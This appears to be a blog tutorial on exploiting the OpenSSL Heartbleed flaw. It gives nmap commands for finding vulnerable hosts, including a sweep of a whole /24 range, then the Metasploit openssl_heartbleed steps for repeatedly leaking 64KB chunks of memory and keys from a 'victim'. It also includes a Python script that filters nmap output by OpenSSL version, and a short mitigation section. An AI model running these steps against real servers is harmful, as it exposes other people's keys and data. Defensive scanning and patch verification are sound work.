By this time almost everyone reading this article knows what the Heartbleed attack is and what its impact is, so I am not going to explain what it is; instead I will show you how to exploit this vulnerability. You can find the link to the demo video at the end of this article.
If you need to know more about what this vulnerability is all about, you can find out here.
The tool I am using to scan for vulnerable servers is Nmap, and the tool I am using to exploit the vulnerability is Metasploit (MSF).
According to OpenSSL, "Only 1.0.1 and 1.0.2-beta releases of OpenSSL are affected including 1.0.1f and 1.0.2-beta1".
Reconnaissance Stage:
I am using Nmap to find the open ports and the version of OpenSSL. You can run the normal nmap version scan to find the OpenSSL version; to make my life easier I have used the "heartbleed_detect" script, which I will post later so you can use it too.
Nmap command:
You can attack the following services: FTP, SMTP, IMAP and POP3. So all you need to find is which ports these services are running on and pass those ports to Nmap; this will make your scan quicker.
Syntax:
nmap -sV hostname
nmap --script heartbleed_detect hostname
nmap -p portnumber --script heartbleed_detect hostname
Example:
nmap --script heartbleed_detect www.fact-in-hack.blogspot.com
nmap -p 21 --script heartbleed_detect 1.1.1.1
nmap -p 443 --script heartbleed_detect 1.1.1.1
If you want to find more servers in the network that are affected by this vulnerability, simply use CIDR notation; in this case it is going to scan 256 hosts in the given network range.
Example:
nmap --script heartbleed_detect 1.1.1.1/24
Another good reason I am using this is that it covers all devices: even routers and switches are affected, so you can even find the keys from a router.
A few Cisco appliances that I am aware of being affected by this vulnerability are the Cisco ASA 5500 series, Cisco Nexus 1000V Series Switches and the Cisco MS200X Ethernet Access Switch.
You can further simplify your nmap output by using grep and sort to filter the results, which makes them easier to refer to later in the attack phase or to automate the attack.
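As an added example (not part of the original post), here is a small Python triage script that does the grep-and-sort style filtering described above: it pulls OpenSSL version strings out of nmap -sV output and applies the affected-version rule quoted from the OpenSSL advisory (1.0.1 through 1.0.1f and 1.0.2-beta1 affected; 1.0.1g and 1.0.2-beta2 fixed). The nmap output lines are constructed sample input. Distributions often backport the fix without changing the upstream version string, so a banner match is only a triage hint; the heartbleed_detect script result is what you should trust.

```python
import re
from typing import List, Optional, Tuple

# Matches "OpenSSL 1.0.1e" or "OpenSSL/1.0.2-beta1" inside an nmap -sV output line.
VERSION_RE = re.compile(r"OpenSSL[ /](\d+\.\d+\.\d+)([a-z]?)(?:-beta(\d*))?")

Version = Tuple[Tuple[int, int, int], str, Optional[int]]


def parse_version(text: str) -> Optional[Version]:
    """Return ((major, minor, patch), letter, beta_number) or None if no OpenSSL banner."""
    m = VERSION_RE.search(text)
    if not m:
        return None
    base = tuple(int(p) for p in m.group(1).split("."))
    beta = None
    if m.group(3) is not None:            # "-beta" suffix present
        beta = int(m.group(3)) if m.group(3) else 0
    return (base[0], base[1], base[2]), m.group(2), beta


def is_affected(version: Version) -> bool:
    """Advisory rule: 1.0.1 .. 1.0.1f and 1.0.2-beta1 are vulnerable, 1.0.1g / 1.0.2-beta2 are fixed."""
    base, letter, beta = version
    if base == (1, 0, 1) and beta is None:
        return letter <= "f"              # "" (plain 1.0.1) sorts before "a", so it counts
    if base == (1, 0, 2) and beta is not None:
        return beta <= 1
    return False


def triage(nmap_output: str) -> List[Tuple[str, int, str]]:
    """Return sorted (host, port, banner) tuples whose OpenSSL banner falls in the affected range."""
    hits, host = [], None
    for line in nmap_output.splitlines():
        report = re.match(r"Nmap scan report for (\S+)", line)
        if report:
            host = report.group(1)
            continue
        port = re.match(r"(\d+)/tcp\s+open", line)
        version = parse_version(line)
        if host and port and version and is_affected(version):
            hits.append((host, int(port.group(1)), VERSION_RE.search(line).group(0)))
    return sorted(hits)


# Constructed sample of nmap -sV normal output (not a real scan).
SAMPLE = """\
Nmap scan report for 1.1.1.1
443/tcp open  ssl/http Apache httpd 2.2.22 ((Ubuntu)) OpenSSL/1.0.1e
25/tcp  open  smtp     Postfix smtpd (OpenSSL 1.0.1g)
Nmap scan report for 1.1.1.2
21/tcp  open  ftp      vsftpd 3.0.2 (OpenSSL 1.0.0k)
993/tcp open  ssl/imap Dovecot imapd (OpenSSL 1.0.2-beta1)
"""

if __name__ == "__main__":
    for host, port, banner in triage(SAMPLE):
        print(f"{host}:{port} {banner} -> confirm with heartbleed_detect, then patch")
```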
Attack Stage:
To attack the victim we are going to use Metasploit; before you run this, you need to update MSF to get the "openssl_heartbleed" auxiliary module.
MSF USAGE:
msf > use auxiliary/scanner/ssl/openssl_heartbleed
msf auxiliary(openssl_heartbleed) > set rhosts 1.1.1.1
msf auxiliary(openssl_heartbleed) > set rport 443
msf auxiliary(openssl_heartbleed) > set verbose TRUE
msf auxiliary(openssl_heartbleed) > exploit
This is the output you get. You will get only 64KB of data per attempt, but the attack can be run repeatedly, so you can keep pulling data from the victim's memory as it changes.
Mitigation Stage:
The patch has already been released, so fixing this is just a matter of time. The vulnerability will no longer exist once you update OpenSSL to the latest version, 1.0.1g, or recompile with -DOPENSSL_NO_HEARTBEATS; alternatively you can find the latest version here.
LIVE DEMO: http://youtu.be/EmPE3qMUzqY
Wireshark data capture